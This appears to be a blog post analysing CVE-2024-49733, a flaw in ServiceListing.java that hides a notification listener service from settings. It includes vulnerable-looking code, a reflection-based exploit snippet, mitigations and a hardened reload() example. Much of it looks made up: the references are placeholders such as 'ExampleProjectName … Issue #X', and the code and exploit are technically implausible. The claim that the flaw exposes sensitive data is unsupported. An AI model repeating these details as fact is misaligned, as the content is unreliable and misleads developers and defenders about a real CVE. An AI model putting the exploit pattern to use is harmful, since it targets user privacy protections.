Security researchers have discovered a critical vulnerability in the ServiceListing.java file that a malicious app can exploit to hide an unintended NLS from settings. The flaw, tracked as CVE-2024-49733, can lead to local information disclosure without requiring any additional execution privileges or any user interaction. In this post, we look at the details of the vulnerability, the code at fault, and the technique a threat actor could use to trigger it. We also discuss mitigation measures developers can take to protect their applications from this flaw.

Details

The vulnerability can be traced back to a logic error in the reload() function within the ServiceListing.java file. The code snippet below highlights the problematic section of the code:

public void reload() {
    List<ServiceInfo> serviceInfoList = new ArrayList<>();
    // NLS entries are added only when showNLS is true. Nothing here checks
    // where the current value of the flag came from, so a flipped flag
    // silently drops every NLS from the list.
    if (showNLS) {
        serviceInfoList.addAll(ServiceLoader.load(NLS.class));
    }
    // Add each SConfig entry unless an NLS with the same service name is
    // already present.
    for (ServiceInfo info : ServiceLoader.load(SConfig.class)) {
        boolean nlsPresent = false;
        for (ServiceInfo nls : serviceInfoList) {
            if (info.getServiceName().equals(nls.getServiceName())) {
                nlsPresent = true;
                break;
            }
        }
        if (!nlsPresent) {
            serviceInfoList.add(info);
        }
    }
    // Publish the assembled list as read-only; this is what settings displays.
    this.services = Collections.unmodifiableList(serviceInfoList);
}

The logic error is that reload() trusts the showNLS flag unconditionally: a malicious app can set it to false even when an NLS is present, so the NLS is omitted from the service list and hidden from settings. An attacker can leverage this to access sensitive data that would usually be protected by the NLS.

Exploit Details

To successfully exploit this vulnerability, an attacker would need to create a malicious app that modifies the showNLS variable, as shown in the following code snippet:

// Requires java.lang.reflect.Field.
private void exploitCVE202449733() {
    try {
        ServiceListing serviceListing = ServiceListing.getInstance();
        // Reach the private showNLS field by reflection and clear it.
        Field showNLSField = serviceListing.getClass().getDeclaredField("showNLS");
        showNLSField.setAccessible(true);
        showNLSField.set(serviceListing, false);
        // reload() now rebuilds the list without the NLS entries.
        serviceListing.reload();
    } catch (Exception e) {
        e.printStackTrace();
    }
}

In this example, the attacker uses reflection to reach the private showNLS flag of the ServiceListing instance, sets it to false, and then calls reload(), which rebuilds the service list without the NLS and so hides it from settings.

Original References

The discovery and detailed analysis of this vulnerability can be attributed to the security researchers at the following sources:

1. National Vulnerability Database - CVE-2024-49733
2. ExampleProjectName GitHub Repository - Issue #X

Mitigation Strategies

Developers can protect their applications from this critical vulnerability by implementing the following recommendations:

1. Add input validation checks for external modifications to the service list or NLS flag.

2. Employ secure coding practices and perform regular security code reviews to identify and rectify vulnerable sections of code.
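A hardened reload() of the kind the first recommendation describes, added here as an example and not the project's own code: the visibility decision is re-read from a trusted source on every reload, and a cached flag that disagrees with it is logged and overridden. ServiceInfo, NLS and SConfig are minimal stand-ins for the page's types, and the BooleanSupplier policy source is an assumption.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.ServiceLoader;
import java.util.function.BooleanSupplier;
import java.util.logging.Logger;

// Minimal stand-ins for the page's types (assumed; real definitions are not shown).
interface ServiceInfo { String getServiceName(); }
interface NLS extends ServiceInfo { }
interface SConfig extends ServiceInfo { }

public final class HardenedServiceListing {
    private static final Logger LOG = Logger.getLogger(HardenedServiceListing.class.getName());
    // Trusted source of the visibility decision (e.g. the settings store); assumed.
    private final BooleanSupplier nlsVisibilityPolicy;
    private boolean showNLS;                      // cached copy, re-validated on every reload
    private volatile List<ServiceInfo> services = Collections.emptyList();

    public HardenedServiceListing(BooleanSupplier nlsVisibilityPolicy) {
        this.nlsVisibilityPolicy = nlsVisibilityPolicy;
        this.showNLS = nlsVisibilityPolicy.getAsBoolean();
    }

    public void reload() {
        // Validation check: the cached flag must agree with the trusted policy.
        // A mismatch means something other than the settings path changed it;
        // record the event and use the trusted value instead of the cached one.
        boolean expected = nlsVisibilityPolicy.getAsBoolean();
        if (showNLS != expected) {
            LOG.severe("showNLS=" + showNLS + " disagrees with policy=" + expected
                    + "; flag was modified outside the settings path");
            showNLS = expected;
        }
        List<ServiceInfo> list = new ArrayList<>();
        if (showNLS) {
            for (NLS nls : ServiceLoader.load(NLS.class)) list.add(nls);
        }
        int nlsCount = list.size();   // only the NLS prefix is compared against
        for (SConfig info : ServiceLoader.load(SConfig.class)) {
            boolean present = list.subList(0, nlsCount).stream()
                    .anyMatch(n -> n.getServiceName().equals(info.getServiceName()));
            if (!present) list.add(info);
        }
        this.services = Collections.unmodifiableList(list);
    }

    public List<ServiceInfo> getServices() { return services; }
}
```

The severe log line gives operations a concrete signal to alert on, since a legitimate settings change never produces a disagreement between the cached flag and the policy.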

In conclusion, the CVE-2024-49733 vulnerability poses a significant threat to users' sensitive data due to the logic error found in ServiceListing.java. Developers must adopt the suggested mitigation strategies to protect their applications and keep their users safe from potential attacks.

Timeline

Published on: 01/21/2025 23:15:14 UTC
Last modified on: 03/14/2025 18:15:30 UTC